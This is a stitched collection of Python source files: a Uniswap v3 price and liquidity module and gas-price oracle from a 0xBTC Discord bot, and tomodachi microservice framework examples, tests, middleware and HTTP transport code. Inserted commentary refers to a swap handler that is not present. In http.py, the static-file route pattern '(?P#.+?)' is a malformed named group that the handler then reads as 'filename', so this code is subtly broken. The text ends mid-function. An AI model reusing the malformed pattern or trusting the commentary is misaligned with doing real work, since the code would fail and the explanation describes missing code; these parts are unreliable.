liquidity_tokens, liquidity_pair = get_reserves(self._w3, self.currency_symbol, paired_token_symbol, fee)
# bail early if the number of tokens LPd is very small
# TODO: this should probably be configurable. Or generated automatically
# based on some USD value, not token value
if liquidity_tokens < _MINIMUM_ALLOWED_LIQUIDITY_IN_TOKENS:
raise NoLiquidityException(f"Less than {_MINIMUM_ALLOWED_LIQUIDITY_IN_TOKENS} tokens LP'd for exchange contract.")
# get price of paired token (in USD) to determine price of
# <self.currency_symbol> in USD. Strategy changes depending on pair
price_in_paired_token = get_price(self._uniswap_api, paired_token_symbol, self.currency_symbol, fee)
if paired_token_symbol == "WETH":
paired_token_price_in_usd = self.eth_price_usd
else:
# get the paired token's price in Eth. If there is less than $500 in
# liquidity to determine this, then skip this pair when determining price.
liquidity_eth_of_paired_token, _ = get_reserves(self._w3, "WETH", paired_token_symbol, _DEFAULT_PAIR_FEE)
if liquidity_eth_of_paired_token < 500 / self.eth_price_usd:
raise NoLiquidityException(f"Less than {500} USD LP'd for paired token {paired_token_symbol}, pair token price not considered accurate. Skipping pair.")
else:
paired_token_price_in_eth = get_price(self._uniswap_api, "WETH", paired_token_symbol, _DEFAULT_PAIR_FEE)
paired_token_price_in_usd = paired_token_price_in_eth * self.eth_price_usd
price_in_usd = price_in_paired_token * paired_token_price_in_usd
return price_in_usd, liquidity_tokens
async def _update_all_values(self, timeout=10.0, should_update_volume=False):
if should_update_volume:
current_eth_block = self._w3.eth.blockNumber
self.price_eth = None
eth_prices = [
get_price(self._uniswap_api, "DAI", "WETH", _DEFAULT_PAIR_FEE),
get_price(self._uniswap_api, "USDT", "WETH", _DEFAULT_PAIR_FEE),
get_price(self._uniswap_api, "USDC", "WETH", _DEFAULT_PAIR_FEE),
]
self.eth_price_usd = sum(eth_prices) / len(eth_prices) # TODO: should be weighted average
price_usd_weighted_average = WeightedAverage()
total_liquidity_tokens = 0
total_volume_tokens = 0
for exchange_address in getExchangeAddressesForToken(self.currency_symbol):
token0_name, token1_name, fee = getTokensFromExchangeAddress(exchange_address)
token0_address = Token().from_symbol(token0_name).address
token1_address = Token().from_symbol(token1_name).address
#paired_token_address = token0_address if token1_address.lower() == Token().from_symbol(self.currency_symbol).address.lower() else token1_address
#paired_token_symbol = Token().from_address(paired_token_address).symbol
try:
price_usd, liquidity_tokens = await self._get_price_and_liquidity_for_pair(token0_address, token1_address, fee)
except (NoTokenMatchError, PairNotDefinedError) as e:
logging.warning(f"Failed to update {self.exchange_name} pair: {str(e)}")
continue
except NoLiquidityException:
# no liquidity is not an error; simply skip this exchange
continue
else:
price_usd_weighted_average.add(price_usd, liquidity_tokens)
total_liquidity_tokens += liquidity_tokens
if should_update_volume and liquidity_tokens > _MINIMUM_ALLOWED_LIQUIDITY_TOKENS_TO_CHECK_VOLUME:
try:
volume_tokens, volume_pair = await self._get_volume_for_pair(token0_address, token1_address, fee, current_eth_block=current_eth_block, timeout=timeout)
total_volume_tokens += volume_tokens
except requests.exceptions.ReadTimeout:
logging.warning(f"Failed to update Uniswapv3API volume: ReadTimeout")
self.price_usd = price_usd_weighted_average.average()
self.price_eth = self.price_usd / self.eth_price_usd
self.liquidity_tokens = total_liquidity_tokens
self.liquidity_eth = self.liquidity_tokens * self.price_eth
if should_update_volume:
self.hourly_volume_tokens.append(total_volume_tokens)
# trim list to 168 hours (7 days)
self.hourly_volume_tokens = self.hourly_volume_tokens[-168:]
# use last 24 hours for volume
self.volume_tokens = sum(self.hourly_volume_tokens[-24:])
self.volume_eth = self.volume_tokens * self.price_eth
# NOTE: this sets _time_volume_last_updated even if all volume updates
# failed. This is OK for now, it throttles struggling APIs (matic) but
# may not be the ideal behavior.
self._mark_volume_as_updated()
async def _update(self, timeout=10.0):
if self._is_time_to_update_volume():
await self._update_all_values(timeout=timeout, should_update_volume=True)
else:
await self._update_all_values(timeout=timeout, should_update_volume=False)
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
# get some data from 0xBTC pool via Uniswapv3API
e = Uniswapv3API('0xBTC')
e.load_once_and_print_values()
print()
print('0xBTC-WETH liquidity in eth', e.liquidity_eth)
print('0xBTC-WETH liquidity in tokens', e.liquidity_tokens)
print()
# # get some data from KIWI pool via Uniswapv3API
# e = Uniswapv3API('KIWI')
# e.load_once_and_print_values()
# print()
# try:
# print('KIWI-WETH liquidity in eth', e.liquidity_eth)
# except AttributeError:
# pass
# print('KIWI-WETH liquidity in tokens', e.liquidity_tokens)
# e = Uniswapv3API('DAI')
# e.load_once_and_print_values()
```
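The swap handler above decodes the two `int256` balance deltas with `from_u256_twos_complement`, a helper imported from elsewhere in the repo. A minimal sketch of what such a helper has to do, assuming the standard two's-complement encoding of signed 256-bit EVM words:

```python
def from_u256_twos_complement(value: int) -> int:
    """Reinterpret a raw 256-bit unsigned word as a signed int256 (sketch)."""
    # Words with the top bit set encode negative numbers in two's complement.
    if value >= 2**255:
        return value - 2**256
    return value

# A pool balance delta of -1 arrives in the log data as 2**256 - 1.
assert from_u256_twos_complement(2**256 - 1) == -1
```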
#### File: 0x1d00ffff/0xbtc-discord-price-bot/gas_price_api.py
```python
import time
import logging
import aiohttp
from async_url_helpers import get_json_from_url
# data older than this is completely ignored
_OLDEST_ALLOWED_DATA_SECONDS = 300 # 5 minutes
async def get_gas_price():
oracles = (
("https://owlracle.info/eth/gas",
lambda j: j["speeds"][2]['gasPrice']),
("https://ethgas.watch/api/gas",
lambda j: j["fast"]["gwei"]),
("https://data-api.defipulse.com/api/v1/egs/api/ethgasAPI.json?api-key=<KEY>",
lambda j: float(j["fast"]) / 10.0),
)
prices = []
for url, parser_fn in oracles:
try:
prices.append(parser_fn(await get_json_from_url(url)))
except TimeoutError:
logging.warning(f"fail to fetch gas price from {url}")
except:
logging.exception(f"fail to fetch gas price from {url}")
if len(prices) == 0:
raise RuntimeError("no gas oracles responding")
# average all the prices
return sum(prices) / len(prices)
class GasPriceAPI():
def __init__(self):
self._gas_price = None
self._time_last_updated = 0
async def update(self):
self._gas_price = await get_gas_price()
self._time_last_updated = time.time()
@property
def gas_price(self):
if time.time() - self._time_last_updated > _OLDEST_ALLOWED_DATA_SECONDS:
return None
else:
return self._gas_price
async def load_once_and_print():
api = GasPriceAPI()
await api.update()
print(f"gas_price: {api.gas_price}")
if __name__ == "__main__":
import asyncio
loop = asyncio.get_event_loop()
loop.run_until_complete(load_once_and_print())
``` |
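`get_json_from_url` is imported from the repo's `async_url_helpers` module, which is not shown here. A plausible minimal version, using the `aiohttp` dependency the file already imports (the real helper may differ):

```python
import aiohttp

async def get_json_from_url(url: str, timeout: float = 10.0):
    # Sketch: GET a URL and decode the JSON body, raising on HTTP errors.
    client_timeout = aiohttp.ClientTimeout(total=timeout)
    async with aiohttp.ClientSession(timeout=client_timeout) as session:
        async with session.get(url) as response:
            response.raise_for_status()
            return await response.json(content_type=None)
```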
{
"source": "0x1EE7/tomodachi",
"score": 2
} |
#### File: examples/basic_examples/http_auth_service.py
```python
import os
import asyncio
import tomodachi
import uuid
from typing import Any
from aiohttp import web
from tomodachi import http, HttpResponse
@tomodachi.decorator
async def require_auth_token(instance: Any, request: web.Request) -> Any:
post_body = await request.read() if request.body_exists else None
if not post_body or post_body.decode() != instance.allowed_token:
return HttpResponse(body='Invalid token', status=403)
@tomodachi.service
class ExampleHttpAuthService(tomodachi.Service):
name = 'example_http_auth_service'
log_level = 'DEBUG'
allowed_token = str(uuid.uuid4())
uuid = os.environ.get('SERVICE_UUID')
options = {
'http': {
'port': 4711,
'content_type': 'text/plain',
'charset': 'utf-8',
'access_log': True
}
}
@http('GET', r'/get-token/?')
async def get_token(self, request: web.Request) -> str:
return self.allowed_token
@http('POST', r'/validate/?')
@require_auth_token
async def validate(self, request: web.Request) -> str:
return 'Valid auth token!'
```
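The `require_auth_token` decorator short-circuits the endpoint by returning a 403 `HttpResponse` whenever the posted body does not match `instance.allowed_token`. A hypothetical client-side exercise of that flow, assuming the service is running locally on port 4711:

```python
import requests

token = requests.get("http://127.0.0.1:4711/get-token").text
ok = requests.post("http://127.0.0.1:4711/validate", data=token)
bad = requests.post("http://127.0.0.1:4711/validate", data="wrong-token")
assert ok.status_code == 200 and ok.text == "Valid auth token!"
assert bad.status_code == 403 and bad.text == "Invalid token"
```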
#### File: examples/basic_examples/http_middleware_service.py
```python
import os
import asyncio
import tomodachi
from typing import Tuple, Callable, Union, Any, Dict
from aiohttp import web
from tomodachi import http, http_error, http_static, websocket, HttpResponse
from tomodachi.discovery import DummyRegistry
async def middleware_function(func: Callable, service: Any, request: web.Request, context: Dict, *args: Any, **kwargs: Any) -> Any:
# Functionality before function is called
service.log('middleware before')
return_value = await func(*args, **kwargs)
# There's also the possibility to pass in extra arguments or keyword arguments, for example:
# return_value = await func(*args, id='overridden', **kwargs)
# Functionality after function is called
service.log('middleware after')
return return_value
@tomodachi.service
class ExampleHttpMiddlewareService(tomodachi.Service):
name = 'example_http_middleware_service'
log_level = 'DEBUG'
uuid = os.environ.get('SERVICE_UUID')
# Adds a middleware function that is run on every HTTP call.
# Several middlewares can be chained.
http_middleware = [middleware_function]
# Some options can be specified to define credentials, used ports, hostnames, access log, etc.
options = {
'http': {
'port': 4711,
'content_type': 'text/plain',
'charset': 'utf-8',
'access_log': True
}
}
@http('GET', r'/example/?')
async def example(self, request: web.Request, **kwargs: Any) -> str:
await asyncio.sleep(1)
return '友達' # tomodachi
@http('GET', r'/example/(?P<id>[^/]+?)/?')
async def example_with_id(self, request: web.Request, id: str, **kwargs: Any) -> str:
return '友達 (id: {})'.format(id)
@http_error(status_code=404)
async def error_404(self, request: web.Request, **kwargs: Any) -> str:
return 'error 404'
```
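Because `http_middleware` is a plain list, several middleware functions can be chained; each one wraps the next, so "before" work runs in list order and "after" work in reverse. A hypothetical second middleware with the same signature could be added like this:

```python
import time

async def timing_middleware(func: Callable, service: Any, request: web.Request, context: Dict, *args: Any, **kwargs: Any) -> Any:
    # Hypothetical companion middleware: log how long the handler took.
    started = time.time()
    return_value = await func(*args, **kwargs)
    service.log('handler finished in {:.4f}s'.format(time.time() - started))
    return return_value

# http_middleware = [middleware_function, timing_middleware]
```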
#### File: tests/services/invalid_service.py
```python
import tomodachi
@tomodachi.service
class InvalidService(tomodachi.Service):
name = 'test_invalid'
def syntax_error(self) -> error: # type: ignore
pass
```
#### File: tomodachi/tests/test_amqp_transport.py
```python
import os
import signal
import pytest
from typing import Any
from tomodachi.transport.amqp import AmqpTransport, AmqpException
from run_test_service_helper import start_service
def test_routing_key(monkeypatch: Any) -> None:
routing_key = AmqpTransport.get_routing_key('test.topic', {})
assert routing_key == 'test.topic'
routing_key = AmqpTransport.get_routing_key('test.topic', {'options': {'amqp': {'routing_key_prefix': 'prefix-'}}})
assert routing_key == 'prefix-test.topic'
def test_encode_routing_key(monkeypatch: Any) -> None:
routing_key = AmqpTransport.encode_routing_key('test-topic')
assert routing_key == 'test-topic'
routing_key = AmqpTransport.encode_routing_key('test.topic')
assert routing_key == 'test.topic'
def test_decode_routing_key(monkeypatch: Any) -> None:
routing_key = AmqpTransport.decode_routing_key('test-topic')
assert routing_key == 'test-topic'
routing_key = AmqpTransport.decode_routing_key('test.topic')
assert routing_key == 'test.topic'
def test_queue_name(monkeypatch: Any) -> None:
_uuid = '5d0b530f-5c44-4981-b01f-342801bd48f5'
queue_name = AmqpTransport.get_queue_name('test.topic', 'func', _uuid, False, {})
assert queue_name == 'b444917b9b922e8c29235737c7775c823e092c2374d1bfde071d42c637e3b4fd'
queue_name = AmqpTransport.get_queue_name('test.topic', 'func2', _uuid, False, {})
assert queue_name != 'b444917b9b922e8c29235737c7775c823e092c2374d1bfde071d42c637e3b4fd'
queue_name = AmqpTransport.get_queue_name('test.topic', 'func', _uuid, False, {'options': {'amqp': {'queue_name_prefix': 'prefix-'}}})
assert queue_name == 'prefix-b444917b9b922e8c29235737c7775c823e092c2374d1bfde071d42c637e3b4fd'
queue_name = AmqpTransport.get_queue_name('test.topic', 'func', _uuid, True, {})
assert queue_name == '540e8e5bc604e4ea618f7e0517a04f030ad1dcbff2e121e9466ddd1c811450bf'
queue_name = AmqpTransport.get_queue_name('test.topic', 'func2', _uuid, True, {})
assert queue_name == '540e8e5bc604e4ea618f7e0517a04f030ad1dcbff2e121e9466ddd1c811450bf'
queue_name = AmqpTransport.get_queue_name('test.topic', 'func', _uuid, True, {'options': {'amqp': {'queue_name_prefix': 'prefix-'}}})
assert queue_name == 'prefix-540e8e5bc604e4ea618f7e0517a04f030ad1dcbff2e121e9466ddd1c811450bf'
def test_publish_invalid_credentials(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service('tests/services/dummy_service.py', monkeypatch)
instance = services.get('test_dummy')
with pytest.raises(AmqpException):
loop.run_until_complete(AmqpTransport.publish(instance, 'data', 'test.topic', wait=True))
os.kill(os.getpid(), signal.SIGINT)
loop.run_until_complete(future)
out, err = capsys.readouterr()
assert 'Unable to connect [amqp] to 127.0.0.1:54321' in err
assert out == ''
```
#### File: tomodachi/tests/test_schedule_service.py
```python
import asyncio
from typing import Any
from run_test_service_helper import start_service
def test_schedule_service(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service('tests/services/schedule_service.py', monkeypatch)
assert services is not None
assert len(services) == 1
instance = services.get('test_schedule')
assert instance is not None
assert instance.uuid is not None
async def _async(loop: Any) -> None:
seconds = instance.seconds_triggered
third_seconds_triggered = instance.third_seconds_triggered
await asyncio.sleep(1.5)
assert instance.seconds_triggered > seconds
assert instance.third_seconds_triggered == third_seconds_triggered
seconds = instance.seconds_triggered
await asyncio.sleep(4)
assert instance.seconds_triggered > seconds
assert instance.third_seconds_triggered > third_seconds_triggered
loop.run_until_complete(_async(loop))
instance.stop_service()
loop.run_until_complete(future)
```
#### File: tomodachi/tests/test_version.py
```python
import tomodachi
def test_version_exists() -> None:
assert tomodachi.__version__ is not None
```
#### File: tomodachi/helpers/middleware.py
```python
import functools
import inspect
from typing import Callable, List, Any, Dict
async def execute_middlewares(func: Callable, routine_func: Callable, middlewares: List, *args: Any) -> Any:
if middlewares:
middleware_context = {} # type: Dict
async def middleware_bubble(idx: int = 0, *ma: Any, **mkw: Any) -> Any:
@functools.wraps(func)
async def _func(*a: Any, **kw: Any) -> Any:
return await middleware_bubble(idx + 1, *a, **kw)
if middlewares and len(middlewares) <= idx + 1:
_func = routine_func
middleware = middlewares[idx] # type: Callable
arg_len = len(inspect.getfullargspec(middleware).args) - (len(inspect.getfullargspec(middleware).defaults) if inspect.getfullargspec(middleware).defaults else 0)
middleware_arguments = [_func, *args, middleware_context][0:arg_len]
return await middleware(*middleware_arguments, *ma, **mkw)
return_value = await middleware_bubble()
else:
return_value = await routine_func()
return return_value
```
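The bubbling logic above inspects each middleware's signature and trims the argument list to fit, so a middleware may accept as few or as many of `(func, *args, context)` as it wants. A small standalone demonstration of the resulting call order (hypothetical names):

```python
import asyncio

async def handler():
    print("handler")
    return "ok"

async def outer(func, context):
    print("outer: before")
    value = await func()
    print("outer: after")
    return value

async def inner(func, context):
    print("inner: before")
    value = await func()
    print("inner: after")
    return value

# Prints "outer: before", "inner: before", "handler", "inner: after",
# "outer: after" and evaluates to "ok".
asyncio.run(execute_middlewares(handler, handler, [outer, inner]))
```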
#### File: tomodachi/tomodachi/__init__.py
```python
from typing import Any, Optional
import inspect
from tomodachi.__version__ import __version__, __version_info__ # noqa
try:
import tomodachi.helpers.logging
from tomodachi.invoker import decorator
except Exception: # pragma: no cover
pass
try:
from tomodachi.transport.amqp import (amqp,
amqp_publish)
except Exception: # pragma: no cover
pass
try:
from tomodachi.transport.aws_sns_sqs import (aws_sns_sqs,
aws_sns_sqs_publish)
except Exception: # pragma: no cover
pass
try:
from tomodachi.transport.http import (http,
http_error,
http_static,
websocket,
ws,
get_http_response_status,
HttpException,
Response as HttpResponse)
except Exception: # pragma: no cover
pass
try:
from tomodachi.transport.schedule import (schedule,
heartbeat,
minutely,
hourly,
daily,
monthly)
except Exception: # pragma: no cover
pass
__all__ = ['service', 'Service', '__version__', '__version_info__',
'decorator', 'set_service', 'get_service', 'get_instance',
'amqp', 'amqp_publish',
'aws_sns_sqs', 'aws_sns_sqs_publish',
'http', 'http_error', 'http_static', 'websocket', 'ws', 'HttpResponse', 'HttpException',
'schedule', 'heartbeat', 'minutely', 'hourly', 'daily', 'monthly']
CLASS_ATTRIBUTE = 'TOMODACHI_SERVICE_CLASS'
_services = {}
_current_service = {}
def service(cls: Any) -> Any:
setattr(cls, CLASS_ATTRIBUTE, True)
if not getattr(cls, 'log', None):
cls.log = tomodachi.helpers.logging.log
if not getattr(cls, 'log_setup', None):
cls.log_setup = tomodachi.helpers.logging.log_setup
return cls
class Service(object):
TOMODACHI_SERVICE_CLASS = True
log = tomodachi.helpers.logging.log
log_setup = tomodachi.helpers.logging.log_setup
def set_service(name: str, instance: Any) -> None:
_services[name] = instance
_current_service[0] = instance
def get_service(name: Optional[str] = None) -> Any:
if name is None:
if _current_service and len(_current_service):
return _current_service[0]
for k, v in _services.items():
name = k
break
return _services.get(name)
def get_instance(name: Optional[str] = None) -> Any:
# alias for tomodachi.get_service()
return get_service(name)
```
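`set_service` registers each started service under its name while also tracking the most recently started instance, which is what `get_service()` without arguments falls back to. Hypothetical usage from another module once a service is running:

```python
import tomodachi

instance = tomodachi.get_service('example_http_auth_service')  # lookup by name
current = tomodachi.get_service()  # most recently started service
```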
#### File: tomodachi/transport/http.py
```python
import re
import asyncio
import logging
import time
import ipaddress
import os
import pathlib
import inspect
import uuid
import colorama
import functools
from logging.handlers import WatchedFileHandler
from typing import Any, Dict, List, Tuple, Union, Optional, Callable, SupportsInt, Awaitable, Mapping, Iterable # noqa
from multidict import CIMultiDict, CIMultiDictProxy
from aiohttp import web, web_server, web_protocol, web_urldispatcher, hdrs, WSMsgType
from aiohttp.web_fileresponse import FileResponse
from aiohttp.http import HttpVersion
from aiohttp.helpers import BasicAuth
from aiohttp.streams import EofStream
from tomodachi.invoker import Invoker
from tomodachi.helpers.dict import merge_dicts
from tomodachi.helpers.middleware import execute_middlewares
class HttpException(Exception):
def __init__(self, *args: Any, **kwargs: Any) -> None:
self._log_level = kwargs.get('log_level') if kwargs and kwargs.get('log_level') else 'INFO'
class RequestHandler(web_protocol.RequestHandler): # type: ignore
def __init__(self, *args: Any, **kwargs: Any) -> None:
self._server_header = kwargs.pop('server_header', None) if kwargs else None
self._access_log = kwargs.pop('access_log', None) if kwargs else None
super().__init__(*args, **kwargs) # type: ignore
@staticmethod
def get_request_ip(request: Any, context: Optional[Dict] = None) -> Optional[str]:
if request._cache.get('request_ip'):
return str(request._cache.get('request_ip', ''))
if request.transport:
if not context:
context = {}
real_ip_header = context.get('options', {}).get('http', {}).get('real_ip_header', 'X-Forwarded-For')
real_ip_from = context.get('options', {}).get('http', {}).get('real_ip_from', [])
if isinstance(real_ip_from, str):
real_ip_from = [real_ip_from]
peername = request.transport.get_extra_info('peername')
request_ip = None
if peername:
request_ip, _ = peername
if real_ip_header and real_ip_from and request.headers.get(real_ip_header) and request_ip and len(real_ip_from):
if any([ipaddress.ip_address(request_ip) in ipaddress.ip_network(cidr) for cidr in real_ip_from]):
request_ip = request.headers.get(real_ip_header).split(',')[0].strip().split(' ')[0].strip()
request._cache['request_ip'] = request_ip
return request_ip
return None
@staticmethod
def colorize_status(text: Optional[Union[str, int]], status: Optional[Union[str, int, bool]] = False) -> str:
if status is False:
status = text
status_code = str(status) if status else None
if status_code and not logging.getLogger('transport.http').handlers:
output_text = str(text) if text else ''
color = None
if status_code == '101':
color = colorama.Fore.CYAN
elif status_code[0] == '2':
color = colorama.Fore.GREEN
elif status_code[0] == '3' or status_code == '499':
color = colorama.Fore.YELLOW
elif status_code[0] == '4':
color = colorama.Fore.RED
elif status_code[0] == '5':
color = colorama.Fore.WHITE + colorama.Back.RED
if color:
return '{}{}{}'.format(color, output_text, colorama.Style.RESET_ALL)
return output_text
return str(text) if text else ''
def handle_error(self, request: Any, status: int = 500, exc: Any = None, message: Optional[str] = None) -> web.Response:
"""Handle errors.
Returns HTTP response with specific status code. Logs additional
information. It always closes current connection."""
if self.transport is None:
# client has been disconnected during writing.
if self._access_log:
request_ip = RequestHandler.get_request_ip(request, None)
version_string = None
if isinstance(request.version, HttpVersion):
version_string = 'HTTP/{}.{}'.format(request.version.major, request.version.minor)
logging.getLogger('transport.http').info('[{}] [{}] {} {} "{} {}{}{}" - {} "{}" -'.format(
RequestHandler.colorize_status('http', 499),
RequestHandler.colorize_status(499),
request_ip or '',
'"{}"'.format(request._cache['auth'].login.replace('"', '')) if request._cache.get('auth') and getattr(request._cache.get('auth'), 'login', None) else '-',
request.method,
request.path,
'?{}'.format(request.query_string) if request.query_string else '',
' {}'.format(version_string) if version_string else '',
request.content_length if request.content_length is not None else '-',
request.headers.get('User-Agent', '').replace('"', '')
))
headers = {}
headers[hdrs.CONTENT_TYPE] = 'text/plain; charset=utf-8'
msg = '' if status == 500 or not message else message
headers[hdrs.CONTENT_LENGTH] = str(len(msg))
headers[hdrs.SERVER] = self._server_header or ''
resp = web.Response(status=status, # type: ignore
text=msg,
headers=headers) # type: web.Response
resp.force_close() # type: ignore
# some data already got sent, connection is broken
if request.writer.output_size > 0 or self.transport is None:
self.force_close() # type: ignore
elif self.transport is not None:
request_ip = RequestHandler.get_request_ip(request, None)
if not request_ip:
peername = request.transport.get_extra_info('peername')
if peername:
request_ip, _ = peername
if self._access_log:
logging.getLogger('transport.http').info('[{}] [{}] {} {} "INVALID" {} - "" -'.format(
RequestHandler.colorize_status('http', status),
RequestHandler.colorize_status(status),
request_ip or '',
'"{}"'.format(request._cache['auth'].login.replace('"', '')) if request._cache.get('auth') and getattr(request._cache.get('auth'), 'login', None) else '-',
len(msg)
))
return resp
class Server(web_server.Server): # type: ignore
def __init__(self, *args: Any, **kwargs: Any) -> None:
self._server_header = kwargs.pop('server_header', None) if kwargs else None
self._access_log = kwargs.pop('access_log', None) if kwargs else None
super().__init__(*args, **kwargs) # type: ignore
def __call__(self) -> RequestHandler:
return RequestHandler(
self, loop=self._loop, server_header=self._server_header, access_log=self._access_log,
**self._kwargs)
class DynamicResource(web_urldispatcher.DynamicResource): # type: ignore
def __init__(self, pattern: Any, *, name: Optional[str] = None) -> None:
self._routes = [] # type: List
self._name = name
self._pattern = pattern
self._formatter = ''
class Response(object):
def __init__(self, *, body: Optional[Union[bytes, str]] = None, status: int = 200, reason: Optional[str] = None, headers: Optional[Union[Dict, CIMultiDict, CIMultiDictProxy]] = None, content_type: Optional[str] = None, charset: Optional[str] = None) -> None:
if headers is None:
headers = CIMultiDict()
elif not isinstance(headers, (CIMultiDict, CIMultiDictProxy)):
headers = CIMultiDict(headers)
self._body = body
self._status = status
self._reason = reason
self._headers = headers
self.content_type = content_type if hdrs.CONTENT_TYPE not in headers else None
self.charset = charset if hdrs.CONTENT_TYPE not in headers else None
self.missing_content_type = hdrs.CONTENT_TYPE not in headers and not content_type and not charset
def get_aiohttp_response(self, context: Dict, default_charset: Optional[str] = None, default_content_type: Optional[str] = None) -> web.Response:
if self.missing_content_type:
self.charset = default_charset
self.content_type = default_content_type
charset = self.charset
if hdrs.CONTENT_TYPE in self._headers and ';' in self._headers[hdrs.CONTENT_TYPE]:
try:
charset = str([v for v in self._headers[hdrs.CONTENT_TYPE].split(';') if 'charset=' in v][0]).replace('charset=', '').strip()
except IndexError:
pass
elif hdrs.CONTENT_TYPE in self._headers and ';' not in self._headers[hdrs.CONTENT_TYPE]:
charset = None
if self._body and not isinstance(self._body, bytes) and charset:
body = self._body
try:
body_value = body.encode(charset.lower())
except (ValueError, LookupError, UnicodeEncodeError) as e:
logging.getLogger('exception').exception('Uncaught exception: {}'.format(str(e)))
raise web.HTTPInternalServerError() from e # type: ignore
elif self._body:
body_value = self._body.encode() if not isinstance(self._body, bytes) else self._body
else:
body_value = b''
response = web.Response(body=body_value, # type: ignore
status=self._status,
reason=self._reason,
headers=self._headers,
content_type=self.content_type,
charset=self.charset) # type: web.Response
return response
class HttpTransport(Invoker):
async def request_handler(cls: Any, obj: Any, context: Dict, func: Any, method: str, url: str, ignore_logging: Union[bool, List[int], Tuple[int]] = False, pre_handler_func: Optional[Callable] = None) -> Any:
pattern = r'^{}$'.format(re.sub(r'\$$', '', re.sub(r'^\^?(.*)$', r'\1', url)))
compiled_pattern = re.compile(pattern)
default_content_type = context.get('options', {}).get('http', {}).get('content_type', 'text/plain')
default_charset = context.get('options', {}).get('http', {}).get('charset', 'utf-8')
if default_content_type is not None and ";" in default_content_type:
# for backwards compatibility
try:
default_charset = str([v for v in default_content_type.split(';') if 'charset=' in v][0]).replace('charset=', '').strip()
default_content_type = str([v for v in default_content_type.split(';')][0]).strip()
except IndexError:
pass
async def handler(request: web.Request) -> Union[web.Response, web.FileResponse]:
result = compiled_pattern.match(request.path)
values = inspect.getfullargspec(func)
kwargs = {k: values.defaults[i] for i, k in enumerate(values.args[len(values.args) - len(values.defaults):])} if values.defaults else {}
if result:
for k, v in result.groupdict().items():
kwargs[k] = v
@functools.wraps(func)
async def routine_func(*a: Any, **kw: Any) -> Union[str, bytes, Dict, List, Tuple, web.Response, Response]:
routine = func(*(obj, request, *a), **merge_dicts(kwargs, kw))
return_value = (await routine) if isinstance(routine, Awaitable) else routine # type: Union[str, bytes, Dict, List, Tuple, web.Response, Response]
return return_value
if pre_handler_func:
await pre_handler_func(obj, request)
return_value = await execute_middlewares(func, routine_func, context.get('http_middleware', []), *(obj, request))
response = await resolve_response(return_value, request=request, context=context, default_content_type=default_content_type, default_charset=default_charset)
return response
context['_http_routes'] = context.get('_http_routes', [])
route_context = {'ignore_logging': ignore_logging}
if isinstance(method, list) or isinstance(method, tuple):
for m in method:
context['_http_routes'].append((m.upper(), pattern, handler, route_context))
else:
context['_http_routes'].append((method.upper(), pattern, handler, route_context))
start_func = cls.start_server(obj, context)
return (await start_func) if start_func else None
async def static_request_handler(cls: Any, obj: Any, context: Dict, func: Any, path: str, base_url: str, ignore_logging: Union[bool, List[int], Tuple[int]] = False) -> Any:
if '?P#' not in base_url:
pattern = r'^{}(?P#.+?)$'.format(re.sub(r'\$$', '', re.sub(r'^\^?(.*)$', r'\1', base_url)))
else:
pattern = r'^{}$'.format(re.sub(r'\$$', '', re.sub(r'^\^?(.*)$', r'\1', base_url)))
compiled_pattern = re.compile(pattern)
if path.startswith('/'):
path = os.path.dirname(path)
else:
path = '{}/{}'.format(os.path.dirname(context.get('context', {}).get('_service_file_path')), path)
if not path.endswith('/'):
path = '{}/'.format(path)
async def handler(request: web.Request) -> web.Response:
result = compiled_pattern.match(request.path)
filename = result.groupdict()['filename'] if result else ''
filepath = '{}{}'.format(path, filename)
try:
if os.path.commonprefix((os.path.realpath(filepath), os.path.realpath(path))) != os.path.realpath(path) or os.path.isdir(filepath) or not os.path.exists(filepath):
raise web.HTTPNotFound() # type: ignore
pathlib.Path(filepath).open('r')
response = FileResponse(path=filepath, # type: ignore
chunk_size=256 * 1024) # type: web.Response
return response
except PermissionError as e:
raise web.HTTPForbidden() # type: ignore
route_context = {'ignore_logging': ignore_logging}
context['_http_routes'] = context.get('_http_routes', [])
context['_http_routes'].append(('GET', pattern, handler, route_context))
start_func = cls.start_server(obj, context)
return (await start_func) if start_func else None
async def error_handler(cls: Any, obj: Any, context: Dict, func: Any, status_code: int) -> Any:
default_content_type = context.get('options', {}).get('http', {}).get('content_type', 'text/plain')
default_charset = context.get('options', {}).get('http', {}).get('charset', 'utf-8')
if default_content_type is not None and ";" in default_content_type:
# for backwards compatibility
try:
default_charset = str([v for v in default_content_type.split(';') if 'charset=' in v][0]).replace('charset=', '').strip()
default_content_type = str([v for v in default_content_type.split(';')][0]).strip()
except IndexError:
pass
async def handler(request: web.Request) -> web.Response:
request._cache['error_status_code'] = status_code
values = inspect.getfullargspec(func)
kwargs = {k: values.defaults[i] for i, k in enumerate(values.args[len(values.args) - len(values.defaults):])} if values.defaults else {}
@functools.wraps(func)
async def routine_func(*a: Any, **kw: Any) -> Union[str, bytes, Dict, List, Tuple, web.Response, Response]:
routine = func(*(obj, request, *a), **merge_dicts(kwargs, kw))
return_value = (await routine) if isinstance(routine, Awaitable) else routine # type: Union[str, bytes, Dict, List, Tuple, web.Response, Response]
return return_value
return_value = await execute_middlewares(func, routine_func, context.get('http_middleware', []), *(obj, request))
response = await resolve_response(return_value, request=request, context=context, status_code=status_code, default_content_type=default_content_type, default_charset=default_charset)
return response
context['_http_error_handler'] = context.get('_http_error_handler', {})
context['_http_error_handler'][int(status_code)] = handler
start_func = cls.start_server(obj, context)
return (await start_func) if start_func else None
async def websocket_handler(cls: Any, obj: Any, context: Dict, func: Any, url: str) -> Any:
pattern = r'^{}$'.format(re.sub(r'\$$', '', re.sub(r'^\^?(.*)$', r'\1', url)))
compiled_pattern = re.compile(pattern)
access_log = context.get('options', {}).get('http', {}).get('access_log', True)
async def _pre_handler_func(obj: Any, request: web.Request) -> None:
request._cache['is_websocket'] = True
request._cache['websocket_uuid'] = str(uuid.uuid4())
@functools.wraps(func)
async def _func(obj: Any, request: web.Request, *a: Any, **kw: Any) -> None:
websocket = web.WebSocketResponse() # type: ignore
request_ip = RequestHandler.get_request_ip(request, context)
try:
await websocket.prepare(request)
except Exception:
try:
await websocket.close()
except Exception:
pass
if access_log:
logging.getLogger('transport.http').info('[{}] {} {} "CANCELLED {}{}" {} "{}" {}'.format(
RequestHandler.colorize_status('websocket', 101),
request_ip,
'"{}"'.format(request._cache['auth'].login.replace('"', '')) if request._cache.get('auth') and getattr(request._cache.get('auth'), 'login', None) else '-',
request.path,
'?{}'.format(request.query_string) if request.query_string else '',
request._cache.get('websocket_uuid', ''),
request.headers.get('User-Agent', '').replace('"', ''),
'-'
